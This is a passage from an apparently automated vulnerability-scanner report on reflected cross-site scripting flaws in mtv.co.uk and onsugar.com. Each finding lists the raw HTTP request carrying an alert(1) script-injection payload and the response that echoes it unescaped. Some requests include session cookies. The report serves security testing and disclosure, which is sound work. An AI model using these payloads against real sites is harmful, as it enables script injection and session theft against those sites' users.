User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:57 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:58 GMT
Date: Mon, 12 Sep 2011 12:49:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
m.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/blueprint/blueprint/13e42"-alert(1)-"a0ad2d31b48");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.115. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b14d0"-alert(1)-"2105664c6ae was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/b14d0"-alert(1)-"2105664c6ae HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:32 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:32 GMT
Date: Mon, 12 Sep 2011 12:50:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/b14d0"-alert(1)-"2105664c6ae");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.116. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/blackberry.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/blackberry.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfba0"-alert(1)-"2c6339de47 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/bfba0"-alert(1)-"2c6339de47 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13429
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:37 GMT
Date: Mon, 12 Sep 2011 12:50:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/bfba0"-alert(1)-"2c6339de47");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.117. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/bodyform.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/bodyform.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff1e"-alert(1)-"e7d91e0ee6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/2ff1e"-alert(1)-"e7d91e0ee6e HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:38 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/2ff1e"-alert(1)-"e7d91e0ee6e");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.118. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/nokiaSessions.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/nokiaSessions.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88536"-alert(1)-"237f981c1a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/88536"-alert(1)-"237f981c1a HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:38 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/88536"-alert(1)-"237f981c1a");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.119. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/seat.swf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/seat.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2b51"-alert(1)-"b39b60171d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/f2b51"-alert(1)-"b39b60171d6 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:41 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13427
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:41 GMT
Date: Mon, 12 Sep 2011 12:50:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/f2b51"-alert(1)-"b39b60171d6");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.120. http://www.mtv.co.uk/sites/all/themes/mtvuk/subthemes/default_homepage/style.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/subthemes/default_homepage/style.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8a26"-alert(1)-"fe7e87ae90 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/subthemes/default_homepage/a8a26"-alert(1)-"fe7e87ae90?1236968319 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:04 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13467
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:04 GMT
Date: Mon, 12 Sep 2011 12:50:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/subthemes/default_homepage/a8a26"-alert(1)-"fe7e87ae90");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...
2.121. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b038"-alert(1)-"d884786df1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/facebook_connect/4b038"-alert(1)-"d884786df1d HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832637%7CniqThxHrFM6F9um5QMGO0Ha%2F900oOKaea4pFhHEg4fO%2BNyXxQL5KKlHaibhzlVJ9UAEElI6baYteQrbTmlbjWhBTc7kk9vrEDtgGCkCuGSH0545XXfw14KzbHDFnWXT%2B9GpovDipRdhalTg4v5aLt%2BbYGO8otzFEahOJ8nzQ6f3X4cS6fS%2FhDLpvmR%2Fj8BUhKyvPN%2B5kKDVxMtlnpFevWQ%3D%3D%7C440dec8fa777e1eb7ee9a1eda4d09f02ca35174c; expires=Wed, 05-Oct-2011 16:37:17 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:57 GMT
Server: lighttpd/1.4.26
Content-Length: 7693

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/modules/facebook_connect/4b038"-alert(1)-"d884786df1d",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...
2.122. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53383"><script>alert(1)</script>15a9ee32b04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/facebook_connect/53383"><script>alert(1)</script>15a9ee32b04 HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832636%7CnrCFFU5HiGaDcKE22GGcSWnNcIXj2hbzsDv2wu7rlIzzk6DwOI%2FLfUo46NrmlZik4ydq1Il8xCtLWdfstVMAyq%2B%2Baj4E7u%2FAFq9%2B6eHrUycU9M3q%2BIoJrxeOSJv94nqYJSjuszq6LHAUaKfixPBP8FbgPE%2FcknrtnYYHv5hOL0cyj6dyCLRY6WECpUvGWHOyX3w1ixrbGh2FODyUaJ6lSg%3D%3D%7Cd0d75e3d96806545c20a7ac291cd8c7aa2a1fc20; expires=Wed, 05-Oct-2011 16:37:16 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:56 GMT
Server: lighttpd/1.4.26
Content-Length: 7798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/modules/facebook_connect/53383"><script>alert(1)</script>15a9ee32b04&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...
2.123. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d96"><script>alert(1)</script>5c26a4aba3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /statica4d96"><script>alert(1)</script>5c26a4aba3e/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832641%7Ca%2FtbvUs37Q9DtUqtr%2FBY3wsoFZJ6tC9NYob5X2Hi3sLWq8cjORAu%2F8ZB6BMvJLztS9GxF6JhuR7nQ%2Fu38AAUtGFZrcUBzXuKKwab%2BN8v0JA9dJUdmzea5V3Vqao0laNl46FCxLHMqi8ODVZ9YD9Dv%2BF%2BTKE8qe4M8bIYddu2FEq1UAb1ff16kYc0rK3AkJUtB5qwifdNRLN7dcmDG9d9vQ%3D%3D%7C4dc22acb678517f2a04aa1e67a1c489fc827297f; expires=Wed, 05-Oct-2011 16:37:21 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:01 GMT
Server: lighttpd/1.4.26
